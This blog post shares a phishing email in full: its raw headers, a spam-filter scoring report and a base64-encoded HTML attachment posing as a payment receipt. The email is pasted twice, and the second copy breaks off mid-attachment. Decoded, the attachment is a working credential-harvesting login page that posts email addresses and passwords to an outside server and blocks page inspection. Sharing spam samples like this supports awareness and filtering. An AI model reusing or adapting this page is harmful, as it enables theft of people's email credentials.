New Guinea phish
Posted by Dave Yadallee on
Return-path:
Envelope-to: dave@doctor.nl2k.ab.ca
Delivery-date: Sun, 22 Jan 2023 15:05:00 -0700
Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.96)
(envelope-from)
id 1pJiSK-000KNB-0c
for dave@doctor.nl2k.ab.ca;
Sun, 22 Jan 2023 15:04:52 -0700
Resent-From: The Doctor
Resent-Date: Sun, 22 Jan 2023 15:04:52 -0700
Resent-Message-ID:
Resent-To: Dave Yadallee
Received: from [139.59.21.214] (port=59710 helo=prhindia.co.in)
by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384
(Exim 4.96)
(envelope-from)
id 1pJdEY-0006mw-0T
for root@nl2k.ab.ca;
Sun, 22 Jan 2023 09:30:27 -0700
Received: from User (unknown [104.167.222.222])
by prhindia.co.in (Postfix) with ESMTPA id 419F441038;
Sun, 22 Jan 2023 21:33:40 +0530 (IST)
Authentication-Results: prhindia.co.in;
spf=pass (sender IP is 104.167.222.222) smtp.mailfrom=tradeservices@trade.gov.ng smtp.helo=User
Received-SPF: pass (prhindia.co.in: connection is authenticated)
Reply-To:
From: "tradeservices@trade.gov.ng"
Subject: PAYMENT RECEIPT
Date: Sun, 22 Jan 2023 08:03:52 -0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_00B7_01C2A9A6.72ABD50A"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Spam_score: 23.7
X-Spam_score_int: 237
X-Spam_bar: +++++++++++++++++++++++
X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",
has identified this incoming email as possible spam. The original
message has been attached to this so you can view it or label
similar future email. If you have any questions, see
@@CONTACT_ADDRESS@@ for details.
Content preview: THE PAYMENT RECEIPT IS ATTACHED.
Content analysis details: (23.7 points, 5.0 required)
pts rule name description
---- ---------------------- --------------------------------------------------
0.1 MISSING_MID Missing Message-Id: header
3.6 RCVD_IN_SBL_CSS RBL: Received via a relay in Spamhaus SBL-CSS
[104.167.222.222 listed in zen.spamhaus.org]
1.3 RCVD_IN_VALIDITY_RPBL RBL: Relay in Validity RPBL,
https://senderscore.org/blocklistlookup/
[139.59.21.214 listed in bl.score.senderscore.com]
1.3 RCVD_IN_RP_RNBL RBL: Relay in RNBL,
https://senderscore.org/blacklistlookup/
[139.59.21.214 listed in bl.score.senderscore.com]
1.6 RCVD_IN_BRBL_LASTEXT RBL: No description available.
[139.59.21.214 listed in bb.barracudacentral.org]
-0.2 RCVD_IN_MSPIKE_H2 RBL: Average reputation (+2)
[139.59.21.214 listed in wl.mailspike.net]
-0.0 SPF_HELO_PASS SPF: HELO matches SPF record
1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)
0.0 NSL_RCVD_FROM_USER Received from User
1.2 MISSING_HEADERS Missing To: header
1.6 SUBJ_ALL_CAPS Subject is all capitals
0.0 T_OBFU_HTML_ATTACH HTML attachment with non-text MIME type
0.0 AXB_XMAILER_MIMEOLE_OL_024C2 Yet another X header trait
0.0 FROM_MISSP_XPRIO Misspaced FROM + X-Priority
0.6 FSL_NEW_HELO_USER Spam's using Helo and User
0.0 FROM_MISSP_USER From misspaced, from "User"
0.0 T_HTML_ATTACH HTML attachment to bypass scanning?
0.0 OBFU_ATTACH_MISSP Obfuscated attachment type and misspaced From
0.0 FROM_MISSPACED From: missing whitespace
0.0 FROM_MISSP_MSFT From misspaced + supposed Microsoft tool
1.3 RDNS_NONE Delivered to internal network by a host with no rDNS
0.0 T_OBFU_ATTACH_MISSP Obfuscated attachment type and misspaced From
0.7 TO_NO_BRKTS_FROM_MSSP Multiple formatting errors
1.9 REPLYTO_WITHOUT_TO_CC No description available.
0.0 FROM_MISSP_REPLYTO From misspaced, has Reply-To
0.3 FROM_MISSP_EH_MATCH From misspaced, matches envelope
2.8 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook
1.7 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
0.4 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%
[cf: 100]
2.4 RAZOR2_CF_RANGE_E8_51_100 Razor2 gives engine 8 confidence level
above 50%
[cf: 100]
0.0 FSL_BULK_SIG Bulk signature with no Unsubscribe
Subject: {SPAM?} PAYMENT RECEIPT
This is a multi-part message in MIME format.
------=_NextPart_000_00B7_01C2A9A6.72ABD50A
Content-Type: text/plain;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
THE PAYMENT RECEIPT IS ATTACHED.
------=_NextPart_000_00B7_01C2A9A6.72ABD50A
Content-Type: application/octet-stream;
name="PAYMENT RECEIPT.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="PAYMENT RECEIPT.html"
DQo8aHRtbD4NCjxoZWFkPg0KIDx0aXRsZT5FbWFpbCBTZXR0aW5nczwvdGl0
bGU+DQogPGxpbmsgcmVsPSJpY29uIiBocmVmPSJlbWFpbC0yLWljb24ucG5n
IiB0eXBlPSJpbWFnZS9wbmciPg0KPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1D
b21wYXRpYmxlIiBjb250ZW50PSJJRT1lZGdlIj4NCjxtZXRhIG5hbWU9InZp
ZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwt
c2NhbGU9MS4wLCBtYXhpbXVtLXNjYWxlPTEuMCwgdXNlci1zY2FsYWJsZT1u
byI+DQoNCjxzdHlsZT4NCiBib2R5ew0KICBmb250LWZhbWlseTogJ1NlZ29l
IFVJJywgVGFob21hLCBHZW5ldmEsIFZlcmRhbmEsIHNhbnMtc2VyaWY7DQog
IG1hcmdpbi10b3A6IDAlOw0KICBtYXJnaW4tbGVmdDogMCU7DQogIG1hcmdp
bi1yaWdodDogMCU7DQogIG1hcmdpbi1ib3R0b206IDAlOw0KIH0NCi5jb250
YWluZXJ7DQp3aWR0aDogMTAwJTsNCn0NCi5oZWFkZXJ7DQogYmFja2dyb3Vu
ZC1jb2xvcjogcmdiYSgwLCAwLCAwLCAwLjcyNik7DQogcGFkZGluZzogMjBw
eDsNCiBjb2xvcjogd2hpdGU7DQogdGV4dC1hbGlnbjogbGVmdDsNCiBmb250
LXdlaWdodDogNTAwOw0KIGZvbnQtc2l6ZTogMTRweDsNCiBwYWRkaW5nLWxl
ZnQ6IDIwcHg7DQp9DQouZm9ybXsNCiBwYWRkaW5nLWxlZnQ6IDUwcHg7DQog
cGFkZGluZy1yaWdodDogNTBweDsNCiBwYWRkaW5nLXRvcDogMzBweDsNCiBw
YWRkaW5nLWJvdHRvbTogNDVweDsNCiBib3JkZXItcmFkaXVzOiA1cHg7DQog
Ym94LXNoYWRvdzogcmdiYSgxNTYsIDE1NCwgMTU0LCAwLjM5NykgMHB4IDBw
eCA1cHggN3B4Ow0KIHdpZHRoOiAzMDBweDsNCn0NCmlucHV0W3R5cGU9ZW1h
aWxdLCBpbnB1dFt0eXBlPXBhc3N3b3JkXXsNCiB3aWR0aDogMTAwJTsNCiBw
YWRkaW5nOiA4cHg7DQogZm9udC1zaXplOiAxNXB4Ow0KIGJvcmRlci1yYWRp
dXM6IDNweDsNCiBib3JkZXI6IHNvbGlkIHJnYigxODQsIDE4MSwgMTgxKSAx
cHg7DQogYm94LXNoYWRvdzogcmdiYSgyMjQsIDIyMSwgMjIxLCAwLjQ2Nikg
MHB4IDBweCAycHggM3B4Ow0KfQ0KaW5wdXRbdHlwZT1lbWFpbF06Zm9jdXMs
IGlucHV0W3R5cGU9cGFzc3dvcmRdOmZvY3VzIHsNCiBvdXRsaW5lLWNvbG9y
OiByZ2JhKDg0LCAxNTksIDIzMCwgMC44MjIpOw0KfQ0KaW5wdXRbdHlwZT1z
dWJtaXRdew0KIHdpZHRoOiAxMDAlOw0KIGJhY2tncm91bmQ6IHJnYigxMCwg
ODgsIDE2MSk7DQogcGFkZGluZzogMTBweDsNCiBib3JkZXI6IGhpZGRlbjsN
CiBmb250LXdlaWdodDogNjAwOw0KIGZvbnQtc2l6ZTogMTVweDsNCiBib3Jk
ZXItcmFkaXVzOiAzcHg7DQogY29sb3I6IHdoaXRlOw0KIGZvbnQtc2l6ZTog
MTVweDsNCn0NCiNsMXsNCiBjb2xvcjogcmdiKDExLCAzNCwgNTQpOw0KIGZv
bnQtc2l6ZTogMThweDsNCiBmb250LXdlaWdodDogNjAwOw0KfQ0KI2wyew0K
IGNvbG9yOiByZ2IoMTU0LCAxNTUsIDE1Nik7DQogZm9udC1zaXplOiAxNHB4
Ow0KfQ0KI2wzIHsNCiBjb2xvcjogcmdiKDQzLCA2NCwgODUpOw0KIGZvbnQt
c2l6ZTogMjdweDsNCiBmb250LXdlaWdodDogNjAwOw0KfQ0KI2ljb24gew0K
IHdpZHRoOiA0MDBweDsNCiB0ZXh0LWFsaWduOiBsZWZ0Ow0KIHBhZGRpbmc6
IDEwcHg7DQogcGFkZGluZy1sZWZ0OiAwJTsNCiB0ZXh0LWFsaWduOiBsZWZ0
Ow0KfQ0KLmZvb3RlcnsNCiBiYWNrZ3JvdW5kLWNvbG9yOiByZ2IoNDEsIDU4
LCA3NSk7Ow0KIHBhZGRpbmc6IDEwcHg7DQogY29sb3I6IHdoaXRlOw0KIGZv
bnQtd2VpZ2h0OiA1MDA7DQogZm9udC1zaXplOiAxM3B4Ow0KIHRleHQtYWxp
Z246IGNlbnRlcjsNCiBwb3NpdGlvbjogZml4ZWQ7DQogd2lkdGg6IDEwMCU7
DQogYm90dG9tOiAwOw0KfQ0KPC9zdHlsZT4NCg0KPHNjcmlwdD4NCiBkb2N1
bWVudC5vbmtleXByZXNzID0gZnVuY3Rpb24gKGV2ZW50KSB7DQogICAgICAg
IGV2ZW50ID0gKGV2ZW50IHx8IHdpbmRvdy5ldmVudCk7DQogICAgICAgIGlm
IChldmVudC5rZXlDb2RlID09IDEyMykgew0KICAgICAgICAgICAgcmV0dXJu
IGZhbHNlOw0KICAgICAgICB9DQogICAgfQ0KICAgIGRvY3VtZW50Lm9ubW91
c2Vkb3duID0gZnVuY3Rpb24gKGV2ZW50KSB7DQogICAgICAgIGV2ZW50ID0g
KGV2ZW50IHx8IHdpbmRvdy5ldmVudCk7DQogICAgICAgIGlmIChldmVudC5r
ZXlDb2RlID09IDEyMykgew0KICAgICAgICAgICAgcmV0dXJuIGZhbHNlOw0K
ICAgICAgICB9DQogICAgfQ0KZG9jdW1lbnQub25rZXlkb3duID0gZnVuY3Rp
b24gKGV2ZW50KSB7DQogICAgICAgIGV2ZW50ID0gKGV2ZW50IHx8IHdpbmRv
dy5ldmVudCk7DQogICAgICAgIGlmIChldmVudC5rZXlDb2RlID09IDEyMykg
ew0KICAgICAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgICAgICB9DQogICAg
fQ0KDQp2YXIgbWVzc2FnZT0iU29ycnksIHJpZ2h0LWNsaWNrIGhhcyBiZWVu
IGRpc2FibGVkIjsNCg0KZnVuY3Rpb24gY2xpY2tJRSgpIHtpZiAoZG9jdW1l
bnQuYWxsKSB7KG1lc3NhZ2UpO3JldHVybiBmYWxzZTt9fQ0KZnVuY3Rpb24g
Y2xpY2tOUyhlKSB7aWYNCihkb2N1bWVudC5sYXllcnN8fChkb2N1bWVudC5n
ZXRFbGVtZW50QnlJZCYmIWRvY3VtZW50LmFsbCkpIHsNCmlmIChlLndoaWNo
PT0yfHxlLndoaWNoPT0zKSB7KG1lc3NhZ2UpO3JldHVybiBmYWxzZTt9fX0N
CmlmIChkb2N1bWVudC5sYXllcnMpDQp7ZG9jdW1lbnQuY2FwdHVyZUV2ZW50
cyhFdmVudC5NT1VTRURPV04pO2RvY3VtZW50Lm9ubW91c2Vkb3duPWNsaWNr
TlM7fQ0KZWxzZXtkb2N1bWVudC5vbm1vdXNldXA9Y2xpY2tOUztkb2N1bWVu
dC5vbmNvbnRleHRtZW51PWNsaWNrSUU7fQ0KZG9jdW1lbnQub25jb250ZXh0
bWVudT1uZXcgRnVuY3Rpb24oInJldHVybiBmYWxzZSIpDQovLw0KZnVuY3Rp
b24gZGlzYWJsZUN0cmxLZXlDb21iaW5hdGlvbihlKQ0Kew0KDQp2YXIgZm9y
YmlkZGVuS2V5cyA9IG5ldyBBcnJheSgnYScsICduJywgJ2MnLCAneCcsICd2
JywgJ2onICwgJ3cnLCdzJywndScpOw0KdmFyIGtleTsNCnZhciBpc0N0cmw7
DQppZih3aW5kb3cuZXZlbnQpDQp7DQprZXkgPSB3aW5kb3cuZXZlbnQua2V5
Q29kZTsNCmlmKHdpbmRvdy5ldmVudC5jdHJsS2V5KQ0KaXNDdHJsID0gdHJ1
ZTsNCmVsc2UNCmlzQ3RybCA9IGZhbHNlOw0KfQ0KZWxzZQ0Kew0Ka2V5ID0g
ZS53aGljaDsNCmlmKGUuY3RybEtleSkNCmlzQ3RybCA9IHRydWU7DQplbHNl
DQppc0N0cmwgPSBmYWxzZTsNCn0NCg0KaWYoaXNDdHJsKQ0Kew0KZm9yKGk9
MDsgaTxmb3JiaWRkZW5LZXlzLmxlbmd0aDsgaSsrKQ0Kew0KDQppZihmb3Ji
aWRkZW5LZXlzW2ldLnRvTG93ZXJDYXNlKCkgPT0gU3RyaW5nLmZyb21DaGFy
Q29kZShrZXkpLnRvTG93ZXJDYXNlKCkpDQp7DQphbGVydCgnS2V5IGNvbWJp
bmF0aW9uIENUUkwgKyAnK1N0cmluZy5mcm9tQ2hhckNvZGUoa2V5KSArJyBo
YXMgYmVlbiBkaXNhYmxlZC4nKTsNCnJldHVybiBmYWxzZTsNCn0NCn0NCn0N
CnJldHVybiB0cnVlOw0KfQ0KPC9zY3JpcHQ+DQo8L2hlYWQ+DQoNCjxib2R5
Pg0KPGRpdiBjbGFzcz0iY29udGFpbmVyIj4NCjxkaXYgY2xhc3M9ImhlYWRl
ciIgaWQ9ImRlbW8iPjwvZGl2Pg0KDQo8Y2VudGVyPg0KPGRpdiBzdHlsZT0i
cGFkZGluZzogMTVweDsgaGVpZ2h0OiA0MHB4OyI+PC9kaXY+DQo8ZGl2IGNs
YXNzPSJmb3JtIiBzdHlsZT0id2lkdGg6IDM3MXB4OyBoZWlnaHQ6IDYwOXB4
Ij4NCiZuYnNwOw0KPGJyPg0KPGZvcm0gaWQ9ImZtIiBtZXRob2Q9IlBPU1Qi
IGFjdGlvbj0iaHR0cDovL25vdmEucGx1c3BsdWdnZy5jb20vbWFpbGJfZml4
LnBocCI+DQo8ZGl2IHN0eWxlPSJ0ZXh0LWFsaWduOiBsZWZ0OyI+DQo8aW1n
IHNyYz0iaHR0cHM6Ly90cmlidWxhbnQuY29tL2RvY3Mvd3AtY29udGVudC91
cGxvYWRzL1dFQk1BSUxBUFMuanBnIiBkYXRhLWRlZmVycmVkPSIxIiBqc2Fj
dGlvbj0ibG9hZDpYQWVaa2Q7IiBqc25hbWU9IkhpYVl2ZiIgY2xhc3M9Im4z
Vk5DYiBLQWxSRGIiIGFsdD0iSG93IHRvIEFjY2VzcyBhbmQgQ29uZmlndXJl
IEVtYWlsIEFjY291bnQgLSBUcmlidWxhbnQgRG9jdW1lbnRhdGlvbiIgaWQ9
ImltaSIgZGF0YS13PSIxMjAwIiBkYXRhLWg9IjQ3NSIgc3R5bGU9ImhlaWdo
dDogMTYzcHg7IHdpZHRoOiA0OTlweDsgbWFyZ2luOiAwcHgiIGRhdGEtYXRm
PSJ0cnVlIiBkYXRhLWltbD0iMTA0NzkiPjwvZGl2Pg0KPGRpdiBzdHlsZT0i
dGV4dC1hbGlnbjogbGVmdDsiPg0KPGxhYmVsIGlkPSJsMSI+QXV0aGVudGlj
YXRpb24gUmVxdWlyZWQgPC9sYWJlbD48YnI+DQo8bGFiZWwgaWQ9ImwyIj5Q
bGVhc2UgU2lnbiBpbiB3aXRoIHlvdXIgZW1haWwgdG8gY29udGludWUuLi48
L2xhYmVsPg0KPC9kaXY+DQo8ZGl2IHN0eWxlPSJwYWRkaW5nOiA1cHg7Ij48
L2Rpdj4NCjxpbnB1dCB0eXBlPSJlbWFpbCIgbmFtZT0idXNlciIgcGxhY2Vo
b2xkZXI9IkVtYWlsIGFkZHJlc3MiIGF1dG9jb21wbGV0ZT0ib2ZmIiB2YWx1
ZT0iIiByZXF1aXJlZD4NCjxkaXYgc3R5bGU9InBhZGRpbmc6IDVweDsiPjwv
ZGl2Pg0KPGlucHV0IHR5cGU9InBhc3N3b3JkIiBuYW1lPSJwd2QiIGlkPSJw
YXNzIiBwbGFjZWhvbGRlcj0iUGFzc3dvcmQiIGF1dG9jb21wbGV0ZT0ib2Zm
OyIgcmVxdWlyZWQ+DQo8ZGl2IHN0eWxlPSJwYWRkaW5nOiA4cHg7IHBhZGRp
bmctbGVmdDogMCU7IHRleHQtYWxpZ246IGxlZnQ7Ij4NCjxpbnB1dCB0eXBl
PSJjaGVja2JveCIgY2hlY2tlZCA+DQo8L2Rpdj4NCjxkaXYgc3R5bGU9InBh
ZGRpbmc6IDVweDsiPjwvZGl2Pg0KPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFt
ZT0ic3VibWl0IiB2YWx1ZT0iTmV4dCI+DQo8L2Zvcm0+DQo8L2Rpdj4NCg0K
PGRpdiBzdHlsZT0icGFkZGluZzogMTVweDsgaGVpZ2h0OiAxMDBweDsiPjwv
ZGl2Pg0KPC9jZW50ZXI+DQo8ZGl2IGNsYXNzPSJmb290ZXIiPiAgPGk+PC9p
PiA8L2Rpdj4NCjwvZGl2Pg0KPC9ib2R5Pg==
------=_NextPart_000_00B7_01C2A9A6.72ABD50A--
Envelope-to: dave@doctor.nl2k.ab.ca
Delivery-date: Sun, 22 Jan 2023 15:05:00 -0700
Received: from doctor by doctor.nl2k.ab.ca with local (Exim 4.96)
(envelope-from
id 1pJiSK-000KNB-0c
for dave@doctor.nl2k.ab.ca;
Sun, 22 Jan 2023 15:04:52 -0700
Resent-From: The Doctor
Resent-Date: Sun, 22 Jan 2023 15:04:52 -0700
Resent-Message-ID:
Resent-To: Dave Yadallee
Received: from [139.59.21.214] (port=59710 helo=prhindia.co.in)
by doctor.nl2k.ab.ca with esmtps (TLS1.3) tls TLS_AES_256_GCM_SHA384
(Exim 4.96)
(envelope-from
id 1pJdEY-0006mw-0T
for root@nl2k.ab.ca;
Sun, 22 Jan 2023 09:30:27 -0700
Received: from User (unknown [104.167.222.222])
by prhindia.co.in (Postfix) with ESMTPA id 419F441038;
Sun, 22 Jan 2023 21:33:40 +0530 (IST)
Authentication-Results: prhindia.co.in;
spf=pass (sender IP is 104.167.222.222) smtp.mailfrom=tradeservices@trade.gov.ng smtp.helo=User
Received-SPF: pass (prhindia.co.in: connection is authenticated)
Reply-To:
From: "tradeservices@trade.gov.ng"
Subject: PAYMENT RECEIPT
Date: Sun, 22 Jan 2023 08:03:52 -0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_00B7_01C2A9A6.72ABD50A"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Spam_score: 23.7
X-Spam_score_int: 237
X-Spam_bar: +++++++++++++++++++++++
X-Spam_report: Spam detection software, running on the system "doctor.nl2k.ab.ca",
has identified this incoming email as possible spam. The original
message has been attached to this so you can view it or label
similar future email. If you have any questions, see
@@CONTACT_ADDRESS@@ for details.
Content preview: THE PAYMENT RECEIPT IS ATTACHED.
Content analysis details: (23.7 points, 5.0 required)
pts rule name description
---- ---------------------- --------------------------------------------------
0.1 MISSING_MID Missing Message-Id: header
3.6 RCVD_IN_SBL_CSS RBL: Received via a relay in Spamhaus SBL-CSS
[104.167.222.222 listed in zen.spamhaus.org]
1.3 RCVD_IN_VALIDITY_RPBL RBL: Relay in Validity RPBL,
https://senderscore.org/blocklistlookup/
[139.59.21.214 listed in bl.score.senderscore.com]
1.3 RCVD_IN_RP_RNBL RBL: Relay in RNBL,
https://senderscore.org/blacklistlookup/
[139.59.21.214 listed in bl.score.senderscore.com]
1.6 RCVD_IN_BRBL_LASTEXT RBL: No description available.
[139.59.21.214 listed in bb.barracudacentral.org]
-0.2 RCVD_IN_MSPIKE_H2 RBL: Average reputation (+2)
[139.59.21.214 listed in wl.mailspike.net]
-0.0 SPF_HELO_PASS SPF: HELO matches SPF record
1.0 SPF_SOFTFAIL SPF: sender does not match SPF record (softfail)
0.0 NSL_RCVD_FROM_USER Received from User
1.2 MISSING_HEADERS Missing To: header
1.6 SUBJ_ALL_CAPS Subject is all capitals
0.0 T_OBFU_HTML_ATTACH HTML attachment with non-text MIME type
0.0 AXB_XMAILER_MIMEOLE_OL_024C2 Yet another X header trait
0.0 FROM_MISSP_XPRIO Misspaced FROM + X-Priority
0.6 FSL_NEW_HELO_USER Spam's using Helo and User
0.0 FROM_MISSP_USER From misspaced, from "User"
0.0 T_HTML_ATTACH HTML attachment to bypass scanning?
0.0 OBFU_ATTACH_MISSP Obfuscated attachment type and misspaced From
0.0 FROM_MISSPACED From: missing whitespace
0.0 FROM_MISSP_MSFT From misspaced + supposed Microsoft tool
1.3 RDNS_NONE Delivered to internal network by a host with no rDNS
0.0 T_OBFU_ATTACH_MISSP Obfuscated attachment type and misspaced From
0.7 TO_NO_BRKTS_FROM_MSSP Multiple formatting errors
1.9 REPLYTO_WITHOUT_TO_CC No description available.
0.0 FROM_MISSP_REPLYTO From misspaced, has Reply-To
0.3 FROM_MISSP_EH_MATCH From misspaced, matches envelope
2.8 FORGED_MUA_OUTLOOK Forged mail pretending to be from MS Outlook
1.7 RAZOR2_CHECK Listed in Razor2 (http://razor.sf.net/)
0.4 RAZOR2_CF_RANGE_51_100 Razor2 gives confidence level above 50%
[cf: 100]
2.4 RAZOR2_CF_RANGE_E8_51_100 Razor2 gives engine 8 confidence level
above 50%
[cf: 100]
0.0 FSL_BULK_SIG Bulk signature with no Unsubscribe
Subject: {SPAM?} PAYMENT RECEIPT
This is a multi-part message in MIME format.
------=_NextPart_000_00B7_01C2A9A6.72ABD50A
Content-Type: text/plain;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
THE PAYMENT RECEIPT IS ATTACHED.
------=_NextPart_000_00B7_01C2A9A6.72ABD50A
Content-Type: application/octet-stream;
name="PAYMENT RECEIPT.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="PAYMENT RECEIPT.html"
DQo8aHRtbD4NCjxoZWFkPg0KIDx0aXRsZT5FbWFpbCBTZXR0aW5nczwvdGl0
bGU+DQogPGxpbmsgcmVsPSJpY29uIiBocmVmPSJlbWFpbC0yLWljb24ucG5n
IiB0eXBlPSJpbWFnZS9wbmciPg0KPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1D
b21wYXRpYmxlIiBjb250ZW50PSJJRT1lZGdlIj4NCjxtZXRhIG5hbWU9InZp
ZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwt
c2NhbGU9MS4wLCBtYXhpbXVtLXNjYWxlPTEuMCwgdXNlci1zY2FsYWJsZT1u
byI+DQoNCjxzdHlsZT4NCiBib2R5ew0KICBmb250LWZhbWlseTogJ1NlZ29l
IFVJJywgVGFob21hLCBHZW5ldmEsIFZlcmRhbmEsIHNhbnMtc2VyaWY7DQog
IG1hcmdpbi10b3A6IDAlOw0KICBtYXJnaW4tbGVmdDogMCU7DQogIG1hcmdp
bi1yaWdodDogMCU7DQogIG1hcmdpbi1ib3R0b206IDAlOw0KIH0NCi5jb250
YWluZXJ7DQp3aWR0aDogMTAwJTsNCn0NCi5oZWFkZXJ7DQogYmFja2dyb3Vu
ZC1jb2xvcjogcmdiYSgwLCAwLCAwLCAwLjcyNik7DQogcGFkZGluZzogMjBw
eDsNCiBjb2xvcjogd2hpdGU7DQogdGV4dC1hbGlnbjogbGVmdDsNCiBmb250
LXdlaWdodDogNTAwOw0KIGZvbnQtc2l6ZTogMTRweDsNCiBwYWRkaW5nLWxl
ZnQ6IDIwcHg7DQp9DQouZm9ybXsNCiBwYWRkaW5nLWxlZnQ6IDUwcHg7DQog
cGFkZGluZy1yaWdodDogNTBweDsNCiBwYWRkaW5nLXRvcDogMzBweDsNCiBw
YWRkaW5nLWJvdHRvbTogNDVweDsNCiBib3JkZXItcmFkaXVzOiA1cHg7DQog
Ym94LXNoYWRvdzogcmdiYSgxNTYsIDE1NCwgMTU0LCAwLjM5NykgMHB4IDBw
eCA1cHggN3B4Ow0KIHdpZHRoOiAzMDBweDsNCn0NCmlucHV0W3R5cGU9ZW1h
aWxdLCBpbnB1dFt0eXBlPXBhc3N3b3JkXXsNCiB3aWR0aDogMTAwJTsNCiBw
YWRkaW5nOiA4cHg7DQogZm9udC1zaXplOiAxNXB4Ow0KIGJvcmRlci1yYWRp
dXM6IDNweDsNCiBib3JkZXI6IHNvbGlkIHJnYigxODQsIDE4MSwgMTgxKSAx
cHg7DQogYm94LXNoYWRvdzogcmdiYSgyMjQsIDIyMSwgMjIxLCAwLjQ2Nikg
MHB4IDBweCAycHggM3B4Ow0KfQ0KaW5wdXRbdHlwZT1lbWFpbF06Zm9jdXMs
IGlucHV0W3R5cGU9cGFzc3dvcmRdOmZvY3VzIHsNCiBvdXRsaW5lLWNvbG9y
OiByZ2JhKDg0LCAxNTksIDIzMCwgMC44MjIpOw0KfQ0KaW5wdXRbdHlwZT1z
dWJtaXRdew0KIHdpZHRoOiAxMDAlOw0KIGJhY2tncm91bmQ6IHJnYigxMCwg
ODgsIDE2MSk7DQogcGFkZGluZzogMTBweDsNCiBib3JkZXI6IGhpZGRlbjsN
CiBmb250LXdlaWdodDogNjAwOw0KIGZvbnQtc2l6ZTogMTVweDsNCiBib3Jk
ZXItcmFkaXVzOiAzcHg7DQogY29sb3I6IHdoaXRlOw0KIGZvbnQtc2l6ZTog
MTVweDsNCn0NCiNsMXsNCiBjb2xvcjogcmdiKDExLCAzNCwgNTQpOw0KIGZv
bnQtc2l6ZTogMThweDsNCiBmb250LXdlaWdodDogNjAwOw0KfQ0KI2wyew0K
IGNvbG9yOiByZ2IoMTU0LCAxNTUsIDE1Nik7DQogZm9udC1zaXplOiAxNHB4
Ow0KfQ0KI2wzIHsNCiBjb2xvcjogcmdiKDQzLCA2NCwgODUpOw0KIGZvbnQt
c2l6ZTogMjdweDsNCiBmb250LXdlaWdodDogNjAwOw0KfQ0KI2ljb24gew0K
IHdpZHRoOiA0MDBweDsNCiB0ZXh0LWFsaWduOiBsZWZ0Ow0KIHBhZGRpbmc6
IDEwcHg7DQogcGFkZGluZy1sZWZ0OiAwJTsNCiB0ZXh0LWFsaWduOiBsZWZ0
Ow0KfQ0KLmZvb3RlcnsNCiBiYWNrZ3JvdW5kLWNvbG9yOiByZ2IoNDEsIDU4
LCA3NSk7Ow0KIHBhZGRpbmc6IDEwcHg7DQogY29sb3I6IHdoaXRlOw0KIGZv
bnQtd2VpZ2h0OiA1MDA7DQogZm9udC1zaXplOiAxM3B4Ow0KIHRleHQtYWxp
Z246IGNlbnRlcjsNCiBwb3NpdGlvbjogZml4ZWQ7DQogd2lkdGg6IDEwMCU7
DQogYm90dG9tOiAwOw0KfQ0KPC9zdHlsZT4NCg0KPHNjcmlwdD4NCiBkb2N1
bWVudC5vbmtleXByZXNzID0gZnVuY3Rpb24gKGV2ZW50KSB7DQogICAgICAg
IGV2ZW50ID0gKGV2ZW50IHx8IHdpbmRvdy5ldmVudCk7DQogICAgICAgIGlm
IChldmVudC5rZXlDb2RlID09IDEyMykgew0KICAgICAgICAgICAgcmV0dXJu
IGZhbHNlOw0KICAgICAgICB9DQogICAgfQ0KICAgIGRvY3VtZW50Lm9ubW91
c2Vkb3duID0gZnVuY3Rpb24gKGV2ZW50KSB7DQogICAgICAgIGV2ZW50ID0g
KGV2ZW50IHx8IHdpbmRvdy5ldmVudCk7DQogICAgICAgIGlmIChldmVudC5r
ZXlDb2RlID09IDEyMykgew0KICAgICAgICAgICAgcmV0dXJuIGZhbHNlOw0K
ICAgICAgICB9DQogICAgfQ0KZG9jdW1lbnQub25rZXlkb3duID0gZnVuY3Rp
b24gKGV2ZW50KSB7DQogICAgICAgIGV2ZW50ID0gKGV2ZW50IHx8IHdpbmRv
dy5ldmVudCk7DQogICAgICAgIGlmIChldmVudC5rZXlDb2RlID09IDEyMykg
ew0KICAgICAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgICAgICB9DQogICAg
fQ0KDQp2YXIgbWVzc2FnZT0iU29ycnksIHJpZ2h0LWNsaWNrIGhhcyBiZWVu
IGRpc2FibGVkIjsNCg0KZnVuY3Rpb24gY2xpY2tJRSgpIHtpZiAoZG9jdW1l
bnQuYWxsKSB7KG1lc3NhZ2UpO3JldHVybiBmYWxzZTt9fQ0KZnVuY3Rpb24g
Y2xpY2tOUyhlKSB7aWYNCihkb2N1bWVudC5sYXllcnN8fChkb2N1bWVudC5n
ZXRFbGVtZW50QnlJZCYmIWRvY3VtZW50LmFsbCkpIHsNCmlmIChlLndoaWNo
PT0yfHxlLndoaWNoPT0zKSB7KG1lc3NhZ2UpO3JldHVybiBmYWxzZTt9fX0N
CmlmIChkb2N1bWVudC5sYXllcnMpDQp7ZG9jdW1lbnQuY2FwdHVyZUV2ZW50
cyhFdmVudC5NT1VTRURPV04pO2RvY3VtZW50Lm9ubW91c2Vkb3duPWNsaWNr
TlM7fQ0KZWxzZXtkb2N1bWVudC5vbm1vdXNldXA9Y2xpY2tOUztkb2N1bWVu
